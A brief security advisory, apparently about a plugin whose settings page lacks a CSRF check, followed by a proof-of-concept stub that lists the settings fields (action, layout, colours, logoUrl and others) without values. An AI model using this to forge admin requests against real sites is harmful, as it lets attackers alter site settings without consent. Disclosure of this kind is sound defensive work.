The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Use the following form to abuse the CSRF vulnerability on the settings page: action|
—|—
layout|
textColor|
contentBackgroundColor|
starColor|
visibilitySubTitle|
visibilitySubTitleTwo|
visibilityAvatar|
visibilityRating|
defaultBgImg|
textAlignment|
logoUrl|